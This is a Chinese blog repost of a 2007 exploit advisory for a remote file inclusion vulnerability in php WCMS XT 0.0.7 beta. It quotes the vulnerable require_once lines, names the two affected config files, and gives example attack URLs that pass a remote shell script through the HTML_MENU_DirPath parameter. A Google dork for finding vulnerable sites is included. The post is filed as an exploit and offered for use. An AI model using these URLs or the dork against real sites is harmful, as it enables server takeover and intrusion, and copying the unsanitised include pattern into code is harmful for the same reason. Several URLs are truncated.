php WCMS XT 0_0_7 BETA 远程文件包含

查看文章

2007-10-02 01:37

#   php WCMS XT   0_0_7 BETA <=   Remote File Inclusion Vulnerability
#
#Dork:http://www.google.com.tr/search? ... php+WCMS+&meta=
//搜索
#
#Vuln Code
##############################################################################################
#
#ERROR1:phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php
#

// Neccessary Classes
    require_once $HTML_MENU_DirPath.'HTML/Menu.php';
    require_once $HTML_MENU_DirPath.'HTML/Menu/DirectRenderer.php';
    require_once $HTML_MENU_DirPath.'HTML/Menu/DirectTreeRenderer.php'; <<< RFI
#
#
#BUG1:phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath
#
#Example1:http://site.com/path/phpwcms_tem ... ?HTML_MENU_DirPath=[[Sh3LLScript]]
#
##############################################################################################
#Vuln Code
##############################################################################################
#
#ERROR2:phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php
#
    require_once $HTML_MENU_DirPath.'HTML/Menu.php';
    require_once $HTML_MENU_DirPath.'HTML/Menu/DirectTreeRenderer.php'; <<< RFI
#
#
#BUG2:phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath
#
#Example2:http://site.com/path/phpwcms_tem ... ?HTML_MENU_DirPath=[[Sh3LLScript]]
//利用方法
#

##############################################################################################
#download:
#
#http://sourceforge.net/project/s ... p;release_id=419910
#
##############################################################################################
#
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> coded by K3ZZAP66345<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
#
#"HAYIRLI RAMAZANLAR...   ;)"
#
#
#####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..##############################

类别：Exp | 添加到搜藏 | 浏览() | 评论 (0)

姓　名：	*姓名最长为50字节

网址或邮箱：	(选填)

内　容：

验证码：	看不清?